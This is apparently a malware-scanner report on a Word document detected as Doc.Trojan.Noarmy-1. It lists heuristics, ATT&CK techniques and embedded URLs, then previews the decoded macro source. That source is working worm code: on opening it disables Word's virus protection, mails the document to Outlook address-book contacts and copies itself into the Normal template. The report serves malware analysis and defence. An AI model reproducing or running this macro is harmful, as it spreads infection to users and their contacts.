MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a high-confidence detection for an obfuscated auto-exec VBA loader within the Document_Open macro. This macro utilizes CreateObject and appears to be designed to download and execute a second-stage payload from one of the embedded URLs. The presence of the 'Doc.Trojan.Noarmy-1' ClamAV detection further supports its malicious nature.
Heuristics 8
-
ClamAV: Doc.Trojan.Noarmy-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Noarmy-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://sn.agat.net In document text (OLE body)
- http://altern.org/gigm/service.htmIn document text (OLE body)
- http://www.donquichotte.comIn document text (OLE body)
- http://www.multimania.com/antisnIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 124653 bytes |
SHA-256: f146233cc75d30f0a8e5ab4eba99f3774c7d72de1568ad90250040477f1d724f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NOSN" Attribute VB_Base = "1Normal.NOSN" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim h7, g8, j1, k2, j8, l1, m5, l8, a5, _ d3, g6, h3, k1, k5, g3, n6, h5, j5, k7: Dim e8, b9, a7, d6, c5, e2, g1, l3, l9, n2, m1, h8, l5, i1, i7, e4, c7, _ c4, f3, h1, d8: Dim g5, _ e1, m4, b3, d4, f7, i3, g2, e5, d2, a4, a3, a2, c2, d1, c3, c1, b2, b1, a1 ' nrotylgytee Private Sub Document_Open() ' vkljft On Error Resume Next: Call f1 ' aqbapxoroqvwzkm Call f2 ' ufuv Randomize: Select Case System.PrivateProfileString(j1, k2, j8) ' sneftrzdxprdbwr Case Is <> j1 ' prnzbaoycly System.PrivateProfileString(j1, k2, j8) = 1&: Case Else ' qpawhteutgnjmx Options.ConfirmConversions = m5 ' piohsrspwkfgtl Options.VirusProtection = m5 ' wxdqxnlngwqnwmk Options.SaveNormalPrompt = m5: End Select: d8 = a5: Set c4 = CreateObject(d8) ' lhsjauxfiizadnw Set f3 = c4.GetNameSpace(l8): Select Case System.PrivateProfileString(j1, d3, g6): Case Is <> h3: Select Case c4 ' pokieyiqafb Case k1: f3.Logon k5, g3 ' fzwsekvovjumwzq For i = 1 To f3.AddressLists.Count: Set g4 = f3.AddressLists(i) ' grkcmgai Set h1 = c4.CreateItem(m5): h2 = g4.AddressEntries.Count ' bgguzxq b6 = m5 ' kvkfpkqyipjdtp For j = 1 To h2: Set j2 = g4.AddressEntries(j): Select Case Len(j2.Address): Case Is _ > 4: Select Case InStr(Len(j2.Address) - 3, j2.Address, n6, vbTextCompare) ' ofynhrtrmkzblo Case Is <> 0 ' yoiniqmfzsojoyd h1.Recipients.Add j2 ' iszxzsknurq b6 = b6 + 1 ' wcwhhxegwg End Select: End Select ' slgc Select Case b6 ' jgvra Case 50 ' hychgo Exit For: End Select: Next j: Select Case Rnd(): Case Is < 0.33: h1.Subject = h5: h1.Body = j5 ' utrnojfdfgkjnn Case Is < 0.66 ' roeeusoapnne h1.Subject = g1 ' fuqjqdkgvcaufh h1.Body = l3 ' avkjbahnlsaey Case Else: h1.Subject = l9 ' elnelxuumd h1.Body = n2 ' scqzhty End Select: h1.Attachments.Add ActiveDocument.FullName ' cmtzpngqeei h1.Send: Next i ' ozojl f3.Logoff: End Select ' smtgixupguodf System.PrivateProfileString(j1, d3, g6) = h3: End Select ' uiyawfv Set n1 = ActiveDocument.VBProject: Set i6 = _ n1.VBComponents.Item(1): Set n1 _ = NormalTemplate.VBProject ' mvuhefepx Set k3 = n1.VBComponents.Item(1): i2 = False: Select Case InStr(1, ActiveDocument.Name, m1): Case False: Select Case i6.Name ' jxddlhfccxxy Case Is <> g6: Set b5 _ = k3: Set f5 = i6 ' gpzhxnymenrjryx i2 = True ' fpjqqebpytzw End Select: End Select: Select Case k3.Name ' cothmb Case Is <> g6 ' mxivvkgror Set b5 = i6: Set f5 = k3 ' pbpxygqemywws i2 = True ' gvwfzszvm End Select ' lfjonjgiz Select Case i2: Case True: i4 _ = b5.CodeModule.CountOfLines - 1 ' wynohjmgwcg c8 = f5.CodeModule.CountOfLines: Select Case c8 ' iadcnub Case Is > _ 0: f5.CodeModule.DeleteLines 1, c8: End Select ' iove c6 = 1 ' lthq c9 = "": j3 = "": a6 = 0 ' dysxmghewoelr For l2 = 1 To i4: h4 = b5.CodeModule.Lines(l2, 1) ' ctbh i = 1 ' acihnxfteblgde f4 = InStr(1, h4, Chr(39)) ' mixzjqj Select Case f4 ' kjhxbtokwotut Case 0 ' tcclf f4 = Len(h4): Case Else ' gkobo f4 = f4 - 2: End Select: Do ' qyrbbyfgqzzne j = InStr(i, h4, Chr(32)): Select Case j ' npevw Case 0: j = Len(h4) + 1 ' bhrujzdylhzo b8 = True ' pyjcogbhesuf Case f4 + 1: b8 = True ' lwlhje Case Else ' ertgcioslly b8 = False ' biljksmdqismt End Select: n5 = Mid(h4, i, j - i) ' czrvaeobz Select Case b8: Case True ' bdgxftgmxphz f6 = b5.CodeModule.Lines(l2 + 1, 1) ' piknl k4 = InStr(1, f6, Chr(32)) ' dkateku Select Case k4: Case 0: j3 = _ "": Case Else ' vkigfkzl j3 = Mid(f6, 1, k4 - 1) ' bzto End Select: End Select ' kkxeqbhjgvg Select Case n5: Case k7 + Chr(58): n5 = e8 + Chr(58): Case e8 + Chr(58) ' kmonhjq n5 = k7 + Chr(58) ' ykaewtxctjnfu Case k7 ' mmuwski n5 = e8: Case e8 ' rdyimwntbzzdup n5 = k7 ' pfovdg End Select ' izqznso Select Case h6: Case False: Select Case Rnd() ' pxmytuxrzhbjpm Case Is _ < 0.02: h6 = True ' vuouikpjyvqki Case Else ' bxumhidsun h6 = False: Select Case b8: Case True ' ximlosne Select Cas ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.